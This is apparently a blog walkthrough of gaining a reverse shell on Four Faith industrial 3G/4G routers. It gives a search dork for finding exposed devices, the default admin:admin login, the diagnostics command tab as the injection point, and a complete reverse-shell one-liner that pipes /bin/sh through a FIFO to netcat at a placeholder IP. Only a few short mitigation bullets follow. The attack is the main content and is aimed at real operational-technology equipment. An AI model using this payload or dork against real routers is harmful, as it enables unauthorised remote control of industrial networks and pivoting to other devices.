Four Faith Industrial routers Command Injection RCE Reverse Shell

After in depth analysis with several industrial routers available in the public internet , i found Chinese industrial routers from a manufacturer called “four faith” , this company offers a wide range of industrial communication solutions , one of them is the 3/4 G Industrial router solution.

In order to find them chose your favorite search engine and look up for the following strings “httpd_four-faith” there are several variations from four faith routers models, that dork find all of them, but the vulnerability is located in the ones that contains “four-faith(build-x.x.x.x)”

When you get connected to the web application will find something like this :

The defaults are admin:admin , as far as we know defaults are a common issue in devices like industrial routers or embed devices for industrial applications, nothing exciting at this point, but let’s take a look in the web application in order to find some issues that could be exploitable in someway.

The default username is “admin”

The first thing that i noticed as interesting break point is the diagnostics options available in the administration tab, then look for “commands” tab in order to get the options to execute shell commands .

So yeah, those guys decided to put a “smart” command shell in order to execute commands , make sense that this could be an interesting entry point for command injection , so probably you’re thinking that this is going to be easy as hell, well let’s see if is possible to get a reverse shell from that execution shell box.

Let’s play with some commands first:

As you can see basically we have command execution partially, i tried to execute NC but seems like can not be executed easily, so won’t be easy to get a reverse shell in this way

In order to confirm my theory i tested the NC command directly in order to get a reverse shell , but didn’t work as expected .

If you try this, won’t work, you taught that would be easy?

So we need to figure out how to get the shell back to our server, and is when bash comes to save our day, basically we can use bash only in order to emulate what netcat does , creating a descriptor assigned to a network node , then with that descriptor we can read and write , at this point sounds awesome, but how we can achieve that ?

Jeff price explained all this in the following post : https://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-127498 , another interesting post about this technique :

https://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

As usual setup your machine in order to listen with netcat with your preferred port following the Jeff example we can create the descriptor in the following way :

Reading the comments about that technique seems like don’t work in many environments, fortunately works as expected in the four-faith router architecture.

The definite payload in order to get a reverse interactive shell from the four faith routers is the following :

ls /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc xxx.xxx.xxx.xxx 1337 >/tmp/f

Few seconds after that you will have your interactive shell in your vps or remote server, and for sure you can execute commands :

Conclusions

  • Change default credentials first of all
  • Assign network firewall rules for out-coming traffic
  • Apply port filtering
  • If you’re not using the web application , why is up and running and publish in the internet?
  • This is an interesting entry point in order to pivot or compromise other devices in the OT network .
  • Several OT / IoT devices comes with this “shell built-in” solutions, so just be care full with that, and you are already aware about what could happen in worst case scenario.